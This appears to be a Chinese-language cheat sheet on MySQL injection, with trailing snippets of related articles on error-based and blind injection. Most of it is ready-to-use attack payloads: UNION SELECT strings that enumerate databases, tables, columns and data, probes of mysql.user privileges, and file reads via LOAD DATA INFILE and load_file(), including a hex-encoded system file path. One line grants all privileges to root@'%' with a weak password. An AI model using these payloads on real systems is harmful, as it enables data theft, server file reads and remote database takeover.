mysql注入總結 mysql注入總結

2021-10-18 22:40:00 字數 2183 閱讀 2069

4.相關函式

system_user() 系統使用者名稱

user() 使用者名稱

current_user 當前使用者名稱

session_user()連線資料庫的使用者名稱

database() 資料庫名

version() mysql資料庫版本

load_file() mysql讀取本地檔案的函式

@@datadir 讀取資料庫路徑

@@basedir mysql 安裝路徑

@@version_compile_os 作業系統 windows server 2003

grant all privileges on *.* to 'root'@'%' identified by '123456' with grant option;

5.mysql一般注入語句

猜字段數

order by n/*

檢視mysql基本資訊

and 1=2 union select 1,2,3,concat_ws(char(32,58,32),0x7c,user(),database(),version()),5,6,7/*

查詢資料庫

and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1/*

and 1=2 union select 1,group_concat(schema_name),3,4 from information_schema.schemata/*

查詢表名

and 1=2 union select 1,2,3,4,table_name,5 from information_schema.tables where table_schema=資料庫的16進製制編碼 limit 1,1/*

and 1=2 union select 1,2,3,4,group_concat(table_name),5 from information_schema.tables where table_schema=資料庫的16進製制編碼/*

查詢字段

and 1=2 union select 1,2,3,4,column_name,5,6,7 from information_schema.columns where table_name=表名的十六進製制編碼 and table_schema=資料庫的16進製制編碼 limit 1,1/*

and 1=2 union select 1,2,3,4,group_concat(column_name),5,6,7 from information_schema.columns where table_name=表名的十六進製制編碼 and table_schema=資料庫的16進製制編碼/*

查詢資料

and 1=2 union select 1,2,3,欄位1,5,欄位2,7,8 from 資料庫.表/*

判斷是否具有讀寫許可權

and (select count(*) from mysql.user)>0/*

and (select count(file_priv) from mysql.user)>0/*

6.mysql讀取寫入檔案

必備條件:

讀:file許可權必備

寫:1.絕對路徑 2.union使用 3. 可以使用''

-------------------------讀----------------------

mysql3.x讀取方法

create table a(cmd text);

load data infile 'c:\\***\\***\\***.txt' into table a;

select * from a;

mysql4.x讀取方法

除上述方法還可以使用load_file()

create table a(cmd text);

insert into a(cmd) values(load_file('c:\\ddd\\ddd\\ddd.txt'));

select * from a;

mysql5.x讀取方法

上述兩種都可以

讀取檔案技巧:

load_file(char(32,26,56,66))

load_file(0x633a5c626f6f742e696e69)

------------寫--------------------------

mysql注 MySQL手注之報錯注入

報錯注入 指在頁面中沒有乙個合適的資料返回點的情況下,利用mysql函式的報錯來創造乙個顯位的注入。先來了解一下報錯注入常用的函式 xml 指可擴充套件標記語言被設計用來傳輸和儲存資料。concat 返回結果為連線引數產 的字串 報錯注入常用的函式 extractvalue 對xml文件進行查詢的函...

mysql顯錯注入 MySQL注入之顯錯注入

庫 就是一堆表組成的資料集合 資料庫裡自帶的系統庫 information schema information schema裡columns表裡存著所有欄位名 information schema裡schemata表裡存著所有庫名 information schema裡tables表裡存著所有表名...

mysql注入總結

目錄 0x00 mysql一般注入 select 0x01 mysql一般注入 insert update 0x02 mysql報錯注入 0x03 mysql一般盲注 0x04 mysql時間盲注 0x05 mysql其他注入技巧 0x06 mysql資料庫版本特性 0x07 宣告 正文 0x00 ...